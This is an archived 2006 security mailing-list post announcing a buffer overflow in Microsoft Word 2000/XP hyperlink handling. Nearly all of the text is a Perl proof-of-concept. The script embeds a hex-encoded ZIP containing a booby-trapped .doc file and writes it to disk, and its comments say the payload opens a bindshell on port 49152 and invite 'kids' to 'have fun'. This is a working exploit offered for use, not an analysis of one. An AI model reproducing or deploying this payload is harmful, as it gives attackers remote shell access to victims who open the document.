[NT] Microsoft WORD Hlink Local Buffer Overflow (Exploit)

---

• From: SecuriTeam <support@xxxxxxxxxxxxxx>
• Date: 10 Jul 2006 17:59:26 +0200

---

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Microsoft WORD Hlink Local Buffer Overflow (Exploit)
------------------------------------------------------------------------


SUMMARY

Improper handling of specially crafted files, allows attackers to execute
arbitrary code using Microsoft Word.

DETAILS

Vulnerable Systems:
* Microsoft Word 2000
* Microsoft Word XP
* Microsoft Word 2002

Immune Systems:
* * Microsoft Word 2003

#!/bin/perl
#
# Microsoft Word hlink 0-day by SYS 49152
#
# this POC works only with:
# win 2ksp4 ENG + word 2000/XP all versions.
# win XP ENG sp1/sp2 + word XP 2002 SP3.
#
# Word 2003 is not vulnerable.
#
# bindshell on port 49152
#
# hey kids.. I hope you know how to use winzip :-)
#
# to get in contact with me.. gforce at operamail.com
# I always like to talk with skilled people..


my $all =
"\x50\x4B\x03\x04\x14\x00\x00\x00\x08\x00\x99\x3D\xE9\x34\xD6\xA6\xCB\xA3\xA9\x0D\x00\x00\x00\x72\x00\x00\x0D\x00\x00\x00\x77\x6F\x72\x64\x68\x6C".
"\x69\x6E\x6B\x2E\x64\x6F\x63\xED\x5D\x0B\x70\x54\xD5\x19\xFE\xEF\x3E\x42\x36\xC9\x62\x48\x42\x40\xC4\x70\xC1\xA0\xE1\x91\x64\x93\x00\x42\x50\x0C".
"\x49\x40\x12\x5E\x09\x01\x91\xE9\xD4\xB0\x64\x77\xB3\x1B\x36\xBB\xCB\xEE\x46\x12\xB5\xD3\xB4\x56\x84\x2E\x3A\xB1\xD4\xB1\x8E\xF8\x6A\xE9\x60\x05".
"\x3A\x58\xDB\x19\xA6\xE3\xB4\xF8\x9E\x56\xAB\x69\x3B\x52\x6D\x3B\x0C\xA2\x54\x2D\x6A\x91\x50\x29\x33\xCA\xED\xF7\xDF\x73\x6F\xB2\x6C\x08\x4B\x22".
"\x0C\xAF\xFB\x9D\xF9\xEE\x79\xDE\xFF\x3F\xE7\xDC\x73\xEF\x79\xEC\x39\x49\xF7\xDB\x23\x0E\x3C\xFD\xDC\x98\xF7\x29\x01\x73\xC8\x4C\x27\x15\x1B\xA5".
"\xC4\x85\x49\xE0\x34\xDD\x93\x49\x34\x43\x0B\x3B\xA9\x28\x0A\x07\x95\x81\x8A\x81\x4B\x0A\x9F\xFE\xFC\x45\xB2\x56\xD8\x2C\x44\xFF\xCB\xFA\x7D\xEF".
"\x93\x05\xF0\xE0\xCB\xB3\x89\x86\xD3\x9A\x96\x35\x2D\x9F\xCF\xFF\x7C\x3E\xF5\x83\xCD\x92\x4B\x85\x63\x88\x36\x4F\x15\x2C\x4F\xEF\x9F\x26\x1E\x8A".
"\x72\x55\x52\xB7\x8E\x8D\xEA\xF5\x05\x13\xF5\xDA\xF1\xEE\x81\xEC\x9C\x38\x09\xDD\x5A\xF8\x8F\xAD\x03\xDB\x19\xB0\x9F\xD2\x6C\x3D\xFD\x93\xC3\x88".
"\x8E\xA2\x59\xEF\x41\x78\x01\xFC\x07\xB4\xF4\x83\xB5\xF3\x20\x87\x45\xCA\xC3\x84\xFF\x6C\xEC\x7C\xD8\x0F\xD9\x88\x96\xE1\xC6\x0F\x50\x9B\x95\xF0".
"\x57\x23\x7C\x24\xF5\x87\x5E\x6E\x5D\x5F\x22\x92\xE5\xAF\x7A\xD8\xA9\xE9\x13\xEB\x33\x51\xAE\xEE\x5F\x85\xFB\x72\x61\xFF\x4B\xFB\x34\x24\xDA\x9C".
"\x8E\x1B\x4B\xA2\x9C\x44\x7F\x5E\x82\x7E\xFD\xFE\xC1\xE2\x6C\xE5\xE9\xFE\xC4\x72\x0E\x15\xF1\xE5\x65\xEC\xD4\xDA\x51\x45\x75\xB0\xDC\xF3\xB3\xD7".
"\x24\x3D\x9D\xDE\xDE\xAE\x47\xFA\x07\xA9\x7F\xBE\xF4\x7C\x07\x61\x3B\x48\xB4\x3F\x8A\x4B\x37\x31\x43\xD8\xBF\x86\x7F\x6C\x9C\x3F\x51\x8E\xDE\x7E".
"\xBB\x13\xCA\x37\x90\x9D\x08\x5D\xAE\x0E\x3D\x1D\xEB\x99\x49\xFD\xDB\x4F\x62\xF9\x07\x6A\x87\x89\x48\xD6\x1E\x75\x3B\xBE\x3C\xAF\x98\xFA\xEA\x51".
"\x47\x77\x8A\x68\x87\x89\xE5\xD6\xD3\x99\x48\xEA\x7D\x06\x06\x0C\x18\x38\x1D\xB2\xE5\x05\xAB\xEA\xE6\x2D\x5B\x54\xB3\x64\xA1\x3C\xC1\x1B\x8D\x86".
"\xCA\x8B\x8B\x9D\x67\x05\xD7\x65\x04\xB7\x81\x73\x0E\x8F\x81\x0B\x86\xE6\xF3\x8C\x0B\xA8\xDA\xC0\x59\xC0\x6B\xC0\x40\x12\xF8\x0C\xA8\x58\x9B\x2C".
"\xC1\x40\x28\x9E\x20\xE5\x04\xFD\xFE\x8E\xF1\x23\x23\x5E\x5F\x74\xBC\xDC\xB0\xAA\x41\x9E\x36\xAB\x64\x7A\xA9\x6C\x5B\xEC\x6B\x0A\x07\x23\x41\x4F".
"\x54\x5E\x19\x0C\xBB\x64\xAF\xDF\x17\x58\x2B\x3B\x0A\x5D\xCE\x0E\xBB\x7D\x8D\x2F\xE0\x8A\x78\xDD\x7E\xBF\x1C\x0C\xC8\xA1\x60\x38\xAA\xDD\x64\xB7".
"\x37\xF9\x7D\x4D\x6B\x39\x54\x95\x2A\x17\xD8\xED\x51\xAF\x2F\x22\xD7\x2D\xAD\x92\xD7\x07\xC3\x6B\x23\x88\xF2\x77\xC8\xEB\x7D\x51\x6F\xB9\x7D\xA5".
"\x2F\x20\x97\xAE\x8D\x84\xA6\xC9\xF3\x96\xDC\x2A\x4F\x11\x7A\x4A\x1D\x0E\x47\xF1\xED\x75\xB2\x13\xC2\xEF\x74\x87\x23\xBE\x60\x20\x52\xA4\x26\x45".
"\x60\x24\x54\x52\x1C\x09\x95\xC6\xA7\x47\x28\x6E\x29\x45\x54\x59\x91\xDD\xAE\x8B\x28\x93\xA1\x34\x10\x8C\xCA\x77\xB6\xF9\x03\xEE\xB0\x73\x8D\xDF".
"\x8D\xD8\x68\x50\x6E\x76\x47\x65\xC8\x6A\x0A\x06\xA2\xCE\xA6\xA8\x9A\x11\xB9\xD5\x5D\x54\x24\x9F\x32\x88\x6C\x75\xFA\xFC\xD1\x60\x79\xB3\x27\x18".
"\x6E\x72\x57\x04\x43\x90\xC0\x41\x45\x4D\xC1\xD6\x09\xB2\x94\x73\xBA\xF0\x91\x76\x7B\x24\xEA\xEC\x90\xA3\x6D\x01\xB7\x0B\xF2\x64\xB9\x35\x18\x76".
"\x43\x57\xD4\x1D\x76\x47\xA2\xBE\x40\xB3\x8C\x9A\x08\x34\x47\x64\x27\x82\x51\x41\x51\xAF\x5B\x5E\x8F\x1B\x90\x56\xAB\xA4\xA6\xA0\xCB\xCD\xF9\x86".
"\x74\xD9\xED\x6A\x6B\x72\x46\x51\x78\xA7\x5F\x0E\xB5\x85\x43\xC1\x88\x5B\xAD\xBA\xA9\x72\x8D\xEC\x0A\x06\x7E\x14\xE5\x0A\x0A\xAE\x97\x9D\x81\x8E".
"\x60\xC0\x2D\xA3\x64\x6D\x48\xE1\x43\x70\xB3\xD3\x17\x88\x44\xE5\xB9\x4B\x56\xC9\x7E\xE7\x7A\x94\xBA\x12\xEA\xE5\x65\xEE\x66\x67\xD8\x15\x91\xE1".
"\xEF\x7D\xC6\x76\x7B\xB2\x91\xF5\x25\x02\xCC\xA2\xA5\x54\xA2\x9B\x47\x10\xCD\x01\x6F\x01\xAB\xC1\x79\xE0\x0A\xD0\x0D\xB6\x80\x8F\x81\x5B\xC1\x27".
"\xC0\xED\xE0\x41\xF0\x03\xF0\x28\xF8\x25\x98\x96\x45\x94\x0E\x16\x80\xF3\xC0\xF9\x60\x10\x0C\x81\xEB\xC0\xFB\xC0\x0D\xE0\xB8\x6C\xA2\xC2\x6C\xB1".
"\xB6\x78\xBC\xE7\xE3\xE3\x07\x8F\xEF\xFF\xFB\xFE\x9E\xBF\xF6\xBC\xBD\xBF\x67\xFF\x1B\xFB\x71\x3D\xDE\xB3\x17\x81\x3D\x2F\xF4\x24\xCB\xF8\xA5\x8D".
"\x94\x5C\xEF\x86\xD5\x0A\xD1\x48\x53\xEA\xF7\xCC\x2D\x7F\x46\xCD\xA4\xA4\x4A\xB9\xDE\xED\x95\x5B\x68\x45\xAA\x84\x58\x4B\xEA\xFB\x6A\xAA\x07\x26".
"\xFE\x8E\x28\xC3\xD6\x62\xA6\xDA\x23\x22\x9E\x43\xEF\x2C\xAC\x51\xED\xC6\x75\x8F\xA2\xEE\x45\xB8\xA3\x36\x53\x97\xA7\x6A\x38\x55\x9E\x7A\xE7\x55".
"\x22\xAA\x37\x9C\xF2\xF8\xF9\xAF\xC3\xF3\x0B\x83\x31\x70\x33\xF8\xB8\xF6\x9C\xF7\x68\xCF\x38\xFE\xD9\x4E\x02\xEF\x07\x37\x82\x2F\x81\x2F\x83\x79".
"\xD9\xE2\xB9\x16\x81\xC5\xE0\x2C\xED\xF9\x7E\x1D\x5F\x60\xC3\x93\xE0\xB9\xE0\xE0\xD5\xB1\x5C\x7D\x9D\xFF\xE2\xCA\x9A\x81\xF3\x0F\x8B\x85\x24\x49".
"\x9A\x42\x25\x5D\x5E\x69\xB6\xC3\x34\x6E\x77\x77\xB1\xBC\xFB\xC0\xCD\xE3\x77\x07\x2C\x13\xC0\xEB\xBA\x02\x96\x7C\x70\xE2\x6E\xA2\x51\xF0\x8F\x06".
"\x93\x89\x34\x70\xC9\x81\x7B\x9E\xEA\x64\x89\x92\xA1\xFB\x0F\xFF\xEE\x38\xF1\xDB\xB7\x46\x6C\xFE\x3E\x3D\x4B\x0B\x7F\x91\xCE\x2B\xF1\x66\xF0\x40".
"\x42\xF8\x6A\x28\xF3\x52\x14\x26\x44\xE5\x54\x0C\xE3\x3C\x87\xC6\x65\x98\x8B\xD2\xB8\x0D\x63\x98\x4B\xC0\x78\x0C\x63\x98\x2B\xD0\x34\x5F\xE2\x26".
"\x59\xF9\x2E\xCF\x52\x1B\xC6\x30\xE7\xC6\x78\x0D\x63\x18\xC3\x9C\x67\x73\x38\xAD\xAB\x6B\xF1\x81\xE7\x1C\xAA\x3B\xA5\xAB\xCB\x53\xBB\xE4\x9E\xAE".
"\xAE\xAF\x5A\x0E\x2F\xFE\xF8\x84\xA2\x28\xAB\x63\xFE\xFC\xFC\xD8\xBC\x9B\x62\xF7\x58\xDB\xA5\xFF\xC4\x96\x8E\x8E\x35\xCA\xD2\xE1\x9A\xD8\xB4\x98".
"\xF4\x79\xC9\xDE\x47\x77\xFE\x60\x6F\x74\xD8\x8B\x7F\xB4\x4B\x2F\x1D\x3E\x36\x7B\x79\x7E\x41\xDB\xA1\x58\x63\xBE\x74\xD8\x13\xCB\x58\x18\x6B\x1C".
"\x2B\x1D\x36\x4F\x8D\x6D\xF2\xE7\x8F\x75\xBE\x5C\xF2\x0F\x57\xAC\xCA\x11\xAB\xC8\x88\x85\xC6\xEE\x8A\x55\xA4\xDE\xE1\x7D\x70\xC9\xF0\x4F\xEB\x94".
"\x7D\x9E\x06\x8F\xB7\xAC\xD4\xBB\x3E\x52\xDA\xB8\x5C\xE9\xF6\xBE\xF1\xD9\x57\xB3\x11\xDA\xB8\xE9\x90\xE7\x7B\x9F\xA5\x9A\x56\xB4\x98\x10\xF8\x9E".
"\xED\xBF\xBB\x56\x2A\xFB\x1A\x18\x55\x30\x4A\xB7\xC7\xBB\x97\x3C\x0D\x9B\xDE\x7F\xD8\xBB\x6D\x4C\xE8\x75\xC4\xB5\x64\xD6\xAF\x40\xCA\x6D\xBB\x8A".
"\x3E\xE1\x94\xEC\x3E\x54\xB3\xA1\x06\xEE\xBA\xE5\xCB\xE1\xDB\xE2\xFD\xA8\xE3\xB5\x0E\x78\xE1\xF6\xB4\xB8\x3C\xDE\xA6\xD6\x4D\x87\x5A\xEA\x56\x4D".
"\x7A\x73\xD3\x47\x2D\xD5\x9B\x0E\x96\xEC\xED\x79\xF6\x64\x65\xE1\xC9\xCA\xA9\x5B\x1E\xB8\x6B\xE6\x8E\x1D\x3B\xBC\xE1\x93\xCF\xE7\x2A\x6D\xD5\xCA".
"\xBE\x6F\xAD\x5C\x56\x5F\x5F\xDF\x22\xD5\xD7\xAF\xA8\x87\xD8\x5D\xEF\x59\xDF\x6A\x80\x42\x45\xB9\x51\xE9\x8E\xAD\xFC\xEA\xDE\x57\x5C\xCA\xBE\x65".
"\x88\x38\xF2\x43\x4B\x23\x22\x94\x6E\xF2\x19\xE6\x22\x36\x6B\x93\xA6\x38\xD7\xA6\x98\x88\xFE\x46\xE7\x69\x41\x6B\x14\x89\x7D\xD8\x3C\xE0\x0C\x52".
"\x98\x9A\x30\x65\xAC\x80\x2B\x04\x3B\x4C\x4E\x6A\x05\x7D\xE4\xA7\x22\xC4\x04\xE1\xEB\xBF\xFC\xC5\xBB\x68\xF5\x54\x51\xA4\x29\x1F\x84\xAC\xF3\x85".
"\x1C\x94\x29\x8B\x24\xDA\x4A\x57\xA9\x4B\x76\x02\x2E\xA2\x8A\x2F\x14\x13\xEC\xBE\x4D\xC1\x29\xB4\x44\xCD\x2B\xE7\xCD\x0F\xFF\x08\xD0\x9C\x4F\x93".
"\xF3\xA5\x92\x7C\x9A\x9B\x4F\xCE\x7C\xA2\x29\x54\x39\x99\xAA\x6A\x47\xD3\xD2\x5A\x0B\xD5\xD5\x5A\xA9\x1E\xF6\x1D\xB5\x29\xD4\xB8\x40\x21\x67\x6D".
"\x0E\xB5\x2E\xB0\x59\x22\x60\x74\x81\xD2\x3F\x2F\xFC\xE0\xE6\xD2\x51\xE5\x69\xD8\x19\xBD\x7B\x77\x73\xE1\xE3\xC9\xB9\x93\xDA\xD4\x7A\x93\xA9\x0E".
"\x6E\xAE\xA5\x66\xF5\x1A\xC2\x07\x55\xA6\xF9\xC8\x5B\x00\xB1\x8C\xDB\x50\x77\x3D\xCA\xF3\xB0\xFB\xA4\x64\xD0\x72\xA4\x5D\x03\x09\x6E\xA4\x3E\xB5".
"\x24\x32\x95\xDF\x96\x4E\xA3\xBE\x44\xF9\xA7\xED\x4B\x21\xC9\xAA\x3B\xD2\xCC\x7E\x72\x72\xB0\x89\xF8\x68\x43\x01\x9A\xF4\x31\xE5\x45\x3E\x15\xD0".
"\x2B\x77\x98\x2A\x4B\xA6\x45\xD0\x19\x51\xF5\x9B\xB4\x3A\xAB\xA5\x93\x4B\x8F\x2A\x5F\xC0\xEE\xAB\xC3\xAB\x51\xBE\x35\x48\xE7\x44\xCA\xBB\xA8\x90".
"\x1A\x60\x3B\x91\x6F\x97\x5A\x22\x17\x62\x9A\x50\x9A\x30\x64\x79\xD4\x98\xB0\x56\xA2\x19\xB4\xA2\xE2\xA8\x22\x49\x33\xE2\x64\xD9\x68\x01\x75\x68".
"\x2D\xC6\x8F\x3B\x02\xC8\x1D\x97\xB3\x72\xB2\x2D\xE4\x25\xEA\xA4\x39\x93\x91\xBE\xB2\x42\xA2\xAC\x84\xFB\x2A\x91\x63\x17\xEE\x95\x51\x27\x6E\x6A".
"\x57\x75\xA4\xE1\x79\x66\x6F\x43\x7B\xD8\xD6\x4E\x5C\xD2\xE2\x8A\x11\xD2\x04\xA9\x20\xEE\x3E\xCB\x29\x65\xCC\x22\xF1\x60\xB9\x94\x12\x95\x4A\xF1".
"\xA5\x4C\xA5\x2A\xF5\xB9\x44\x91\x9E\x9F\x4A\x09\xC2\xEC\x94\x0D\xF9\xED\xAA\xFC\x8C\x7C\xE4\x89\x66\xA4\x4A\x55\x68\x11\xDF\x4E\x95\x58\x0E\x37".
"\x8E\x22\x55\x56\xA5\x54\x14\x27\xCB\x4A\x35\x6A\xFD\x70\x3E\xD9\x97\xA3\xDE\x2D\x74\x33\xF8\xCC\x09\x5C\x63\x38\x7F\x7C\x9E\x85\xC3\xD6\xD9\x88".
"\xC2\x60\x0C\xDC\x0C\x3E\x0E\x3E\x01\xEE\x01\x3F\x00\xD3\xD2\x88\xD2\xC1\x02\x70\x12\x78\x3F\xB8\x11\x7C\x09\x7C\x19\xCC\x83\xCC\x71\x60\x11\x58".
"\x0C\xCE\x02\x6F\x02\x7F\xC2\xC2\x1D\x5A\xC6\x3A\x35\x6A\x18\x74\x5C\xEA\x45\x14\x47\x67\x88\x3B\xD3\x7D\x8E\x21\xC6\xC9\xC2\x73\x4E\xF3\x92\x79".
"\x86\x38\x59\x78\xCE\xA9\xCC\xF3\x78\x9F\xFE\x9B\x6C\x5A\x9C\x3B\x3D\xCE\xAD\xBF\x1D\x73\xD0\x96\xAB\xC1\x79\x48\x18\x02\xEF\x4B\x13\xEF\x43\xF6".
"\xED\x39\xCA\xC8\x4E\x71\xE5\x74\xB7\x20\x4D\x0D\xE8\x06\x5B\xC0\xB5\x60\x48\x7B\x47\xEE\x06\x1F\x06\x1F\xB5\x89\x36\x3E\x8C\xC6\x6A\xB4\xC4\xB9".
"\x75\x29\x55\xAC\x4D\x93\xB6\xD0\xD6\xF7\xA6\xDD\xAD\xBD\x69\x0F\x69\x6F\xDA\x4F\x6D\xE2\xCD\x9A\xA2\xBD\x59\x9B\xC1\x47\xC0\xC7\xB4\x37\xEC\x75".
"\x30\x1F\xDA\x0A\xD3\x75\xAD\x65\x1A\x2D\x71\xEE\x81\xC8\x08\x69\x65\xD0\xDF\x4D\x33\xEE\x34\x6B\x71\x7A\xF9\x84\x64\x96\xC8\x95\x6E\x21\x51\xF9".
"\x87\xB4\xDA\xE3\xB4\xBC\x8D\x82\xB7\x42\xF0\x36\x8A\xEF\x84\x76\x52\xEB\xF4\x3D\xC4\x1B\x2E\x78\xF3\x05\x6F\xCF\x50\x2A\xCC\x9D\x52\xAF\xAE\x4C".
"\x9A\x29\x55\xC2\xB0\x5B\xCF\x03\xC3\x94\xA9\x89\xE4\xCA\x5F\xCD\xE9\x2A\xF8\x50\x9B\xA4\x2A\x59\xA1\x7E\x98\x03\xF8\x10\xAE\xC7\x95\x43\xB5\x16".
"\xA0\x42\xA4\x62\x9B\x3F\xAA\xE2\xF3\x15\xEF\xE6\x4C\xDE\x9A\xDB\x85\x44\x26\x53\x8A\xD9\x6A\xB1\x9A\xCC\x96\xFB\xEF\x52\x1B\x74\xA7\x2E\x47\x13".
"\x81\x8F\xB9\x0F\x5D\x9A\x1B\x9F\x68\xEE\xE0\xDC\xD0\x27\xD3\x32\x75\xF8\xC0\x5D\x0C\xD1\x74\xC8\x31\x91\xD5\x2A\x99\xA4\x61\x29\x26\xAB\x7E\x5C".
"\x2A\x93\xFA\xD0\xC9\x97\x06\x74\x0D\xAD\xE8\xA6\x82\x6A\xE7\x58\x76\xBD\xAA\x3D\x3D\xC5\x62\x62\x0C\xA8\x7D\xAE\xDA\x6D\x89\x0E\x75\x76\x8A\xAA".
"\x89\x12\x90\x19\xE7\xEE\xE4\xCB\x4A\xB5\xDB\x6A\xC6\xE7\x5D\xD8\x11\x84\xAD\xE3\xD2\x9E\xEE\xBC\x5B\x02\x2A\x71\x4F\x54\xED\x8E\xC2\x28\x2B\x0F".
"\x99\x64\x74\xF8\x62\xF8\x24\xA3\x0C\x6E\xAD\x1B\x4D\x5E\x2F\x4B\x53\xBA\x7A\xBB\xF3\x33\x21\x99\x46\x96\xC6\x25\xB8\xF9\x2C\xE5\x2D\xC2\x80\xA6".
"\x09\x32\xB9\xF3\x8F\xF4\xDE\x5D\x89\x86\x3A\x37\x75\xE3\x68\xA2\x57\x31\xEA\xF4\xAA\x92\x0E\x95\x6D\xDF\xF0\x69\xCD\xF6\x14\x4A\xAD\xB7\xDB\xD4".
"\xF6\xB3\x13\xE1\x0F\xDA\x78\x1C\xC2\xB5\x6C\xA1\x7B\xBB\x72\xFA\x85\xE6\x68\x7A\xC6\xEB\xE3\x3A\x4B\xBF\x2C\x18\x18\x04\x4A\xA7\x9D\xEA\x9F\x9E".
"\x2E\xF8\x4D\xC0\x13\x0B\xA7\x38\xB8\x56\x76\xAF\xFA\xAC\x2D\xFF\x3C\x53\xFA\x05\xEA\xB5\xE0\x08\x9F\x98\x95\x6E\x21\xFA\xD0\xA2\x1E\xB9\xFE\xEE".
"\x40\x54\x3F\x62\x4A\x96\x76\xB7\x15\x6D\x55\x37\x02\x96\x5E\xBF\x19\x03\xAC\x76\x75\x90\x65\xC0\x80\x81\x2B\x04\x27\x31\xCC\xC0\x88\xA0\x5F\x38".
"\x7F\x8B\x0E\xDC\xF7\xE4\xD1\x13\x4B\xBD\x99\x3B\x1E\x4A\xA5\x29\x37\x3C\xFF\x9E\x03\x61\xED\x88\xC8\xD2\xE2\x79\x0C\xCB\x77\x3E\x45\x62\xBB\xCF".
"\x6E\x12\x7D\xCC\x0B\x44\x6A\x07\xF4\x26\xA9\x43\x56\x7A\x97\xC4\x40\xE6\x43\x12\x23\xB0\x63\xC4\xB3\x50\x21\x84\x65\xF1\x2C\x9D\xC7\xBA\x05\x92".
"\x18\xE7\x4E\x93\xB4\x93\xD4\x12\xCF\x1B\xD1\x51\x4A\xFC\x77\x08\x88\x6E\x87\xCD\x7F\x29\x60\xB5\x24\xC6\x12\xDC\x39\x62\x38\x4C\x21\x49\xE4\x83".
"\x3F\x86\x79\x9A\xCE\x30\x03\xDD\x7F\x1E\x69\x93\x75\x78\xF3\xB4\x7C\xA9\x51\xA7\x89\x8B\x77\x73\x7E\x97\x04\xC3\xAD\x4E\xBF\x90\xC9\xE5\x6A\x6F".
"\x6F\x57\xDD\xAC\x6B\x16\x09\x37\x77\xB2\x09\xBB\xFD\x4B\x1C\x45\x0E\x1E\x01\x62\x7C\x3F\x26\x8F\x65\xAA\xEE\x77\x47\xBD\xBA\xD5\x32\xC7\xA4\xBA".
"\xDF\x7A\xF7\xB9\x45\x4F\xBF\x26\xA9\xEE\x3D\x35\xD7\xF2\x69\x71\xB3\xA6\x9F\x6D\xEE\xC6\xD9\xE6\xAE\xBC\x6F\x4D\xC6\x80\x01\x03\x06\x0C\x18\x30".
"\x60\xC0\x80\x01\x03\x06\x0C\x18\x18\x3A\x06\x9A\xFF\x73\x88\xE9\x9D\x3F\xBD\xB3\xB5\xE8\x9A\xCC\x2D\x8F\x60\xFE\x3F\xF5\xC4\x2F\xAB\x11\x66\x4D".
"\x08\xE3\xB9\xFA\x11\x12\xF3\x75\x9E\xBF\x7A\x49\xCC\xD1\x43\x24\xE6\xDA\x9D\x24\xE6\xE3\x1B\x49\xEC\x18\xE8\x22\xB1\x93\x82\xD7\x0E\x78\xAE\xFF".
"\x14\x89\xB9\xFC\x33\x24\xE6\xF2\xBB\x49\xFC\x55\xAF\x3D\x24\xE6\xFE\x7B\x35\xD9\x7F\x21\x91\xA7\x4F\xBE\x16\xF3\x71\x9E\x9F\x87\xC5\x24\x5F\x9D".
"\x23\xF3\x3C\xDC\xAC\xE9\x64\x7B\x7A\xBA\xB0\x0F\x5E\x9D\x46\xFA\x1A\xED\x40\x76\x5E\xA6\xC8\x7B\xDF\xBA\x41\x46\xA6\xD0\xA6\xAF\x26\x2C\xF7\x45".
"\xFD\x6E\xD2\xE7\xE8\x8B\xB2\xFB\xE6\xE5\xB2\x16\x36\x93\xC4\x1D\x15\x9A\x9F\xDD\x9C\xEF\xC6\xBA\x9A\xEA\xC6\x05\x7C\x32\xBE\xA1\x37\xFF\x73\x61".
"\x5B\xB4\xDF\xF1\x58\xCE\x1C\x1A\xAE\xDA\x3A\x89\xFA\xCA\x32\x8E\xC4\x5F\x7D\x1B\xEA\xBE\x91\x71\xD4\xB7\x59\x81\x65\x7A\xA9\xF8\x14\x1D\x89\xBA".
"\x1C\x36\xE3\x88\xD6\x95\x67\x92\x1D\x8D\x31\x8C\x61\x2E\x06\x93\xEC\x50\x87\x61\x0C\x73\x39\x9A\x64\x47\x38\x2E\x76\x93\xAC\x7C\x97\x67\xA9\x0D".
"\x63\x98\x73\x63\x92\x1D\x2E\x31\x8C\x61\x0C\xF3\x4D\x8D\x71\x44\xCB\x38\xA2\x75\x65\x99\x0B\x73\x44\x2B\x7E\x4D\xCA\xC0\x85\x85\xBE\x56\xC9\x6B".
"\x80\xBC\xC7\x89\xD7\x01\x79\xC5\x93\xD7\x57\x79\xAF\x16\xEF\xD3\xE2\xBD\x59\xBC\x56\xCA\xEB\x95\xBC\x26\xCB\xFF\xEF\x87\xD7\x78\x33\x49\xAC\xE9".
"\xF2\x1E\x2E\x5E\xBB\xE5\x35\x58\xDE\xB9\xCD\xEB\xB7\xA3\xB4\x74\x57\x93\x7A\x38\x87\xAE\x21\xB1\x8E\x79\x2D\x89\x55\xD5\x71\x5A\xFC\x78\xD8\x13".
"\xC0\xEB\x48\xFC\xF7\x93\x89\xE0\xF5\xE0\x0D\x5A\xFC\x24\xD8\x93\x89\x4F\x96\x11\x4D\x05\x0B\xC1\x22\x90\xDB\x91\x03\x2C\x01\x4B\xB5\xB4\x5F\x83".
"\xD3\x35\xB7\x4E\x03\x67\x06\x6F\x84\x0F\xAA\xA7\xEA\xE6\xA9\xE7\xE7\xC2\xD4\x41\x83\x41\x2E\x59\x25\x5D\x16\xB7\xA1\x14\x9B\xF8\x2D\x61\xAF\x88".
"\x9E\x1F\x9F\xB6\xE2\x37\xEB\xD4\xFF\x8C\x72\x23\x69\xFB\xFF\x89\x4F\xFC\x39\xD5\x93\x6E\x43\x45\x1A\x99\x7A\xF5\x33\x92\xA5\x67\xF0\x5E\xC2\x67".
"\xB2\x85\xBB\x24\xEE\x5C\xE0\x50\x30\x1C\xFA\xF5\xDF\x0E\xCE\x56\xFF\x68\xBE\x64\x0A\xF7\x4A\x75\x1D\xDF\x85\x7A\x08\x52\x13\xB5\xA9\x07\x15\xF4".
"\x73\x8C\x67\x83\x31\xD0\xCF\x35\xCE\xEF\xED\xD9\xEA\x67\xF0\xFF\x6D\x62\x58\xA9\x41\xD5\xCA\xBF\x1C\xF0\xB3\xE7\xD3\x76\x9E\xDE\xD3\x91\xFA\x09".
"\xBE\x81\x51\x30\x84\xFA\x97\xF9\x92\x29\xDC\xD6\x7E\x25\x1F\x5C\x7E\x66\x42\x3F\x7F\xB7\x06\xA3\xBF\x00\xEC\xD4\x4E\x47\x48\x54\xA5\xFE\x52\x12".
"\xA2\xA5\x68\x05\x2D\x67\xBC\xEF\x74\xC8\x52\x8F\xEA\x0C\xAE\xFC\x8C\xC1\x6B\x1A\x18\x43\xD1\xAF\x83\xDB\xAE\xF1\x9D\xBC\x72\x21\xE1\xE9\x9B\xD3".
"\x44\x1B\x4A\xFC\x76\xF3\x77\x2A\x61\x6F\x73\x75\xB0\xA9\xAD\xD5\x1D\x88\xAA\x63\x82\xC5\x0D\x1C\x86\x20\xF5\x65\x66\x77\x91\x1E\x5F\x34\x93\x8E".
"\xCD\xFA\xD5\xBA\xD3\x36\x39\x03\x17\x11\xFE\x0F\x50\x4B\x01\x02\x14\x0B\x14\x00\x00\x00\x08\x00\x99\x3D\xE9\x34\xD6\xA6\xCB\xA3\xA9\x0D\x00\x00".
"\x00\x72\x00\x00\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x77\x6F\x72\x64\x68\x6C\x69\x6E\x6B\x2E\x64\x6F\x63\x50".
"\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\x3B\x00\x00\x00\xD4\x0D\x00\x00\x00\x00";

open(olly, ">unzipme!.zip") || die "Can't Write temporary File\n";
binmode (olly);
print olly $all;
close (olly);
print "zip file ready, have fun..\n";

#EoF


ADDITIONAL INFORMATION

The information has been provided by <mailto:gforce@xxxxxxxxxxxxx> SYS
49152.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

---

• Prev by Date: [NT] MIMESweeper For Web XSS
• Next by Date: [NEWS] AdPlug Multiple Buffer Overflows
• Previous by thread: [NT] MIMESweeper For Web XSS
• Next by thread: [NEWS] AdPlug Multiple Buffer Overflows
• Index(es):
  • Date
  • Thread

---

Relevant Pages [NT] Microsoft Word 6.0/95 Document Converter Buffer Overflow (MS04-041) ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WordPad is "a word processing application that uses the MFC rich edit ... Remote exploitation of a buffer overflow vulnerability in Microsoft ... Microsoft Word format files into the Rich Text Format natively handled by ... (Securiteam) [NT] Microsoft Word RTF File Parsing Heap Corruption Vulnerability ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Word RTF File Parsing Heap Corruption Vulnerability ... Microsoft Word is "a word processing application from Microsoft Office. ... Rich Text Format (RTF) is a document file format developed by Microsoft ... (Securiteam) [NT] MS Word Unicode Buffer Overflow (MCW) ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Word is "a word processor program from Microsoft. ... Modify the MCW file by using binary editor as follows, ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ... (Securiteam) [NT] Microsoft Office XP Remote Buffer Overflow Technical Details (MS05-005) ... The following security advisory is 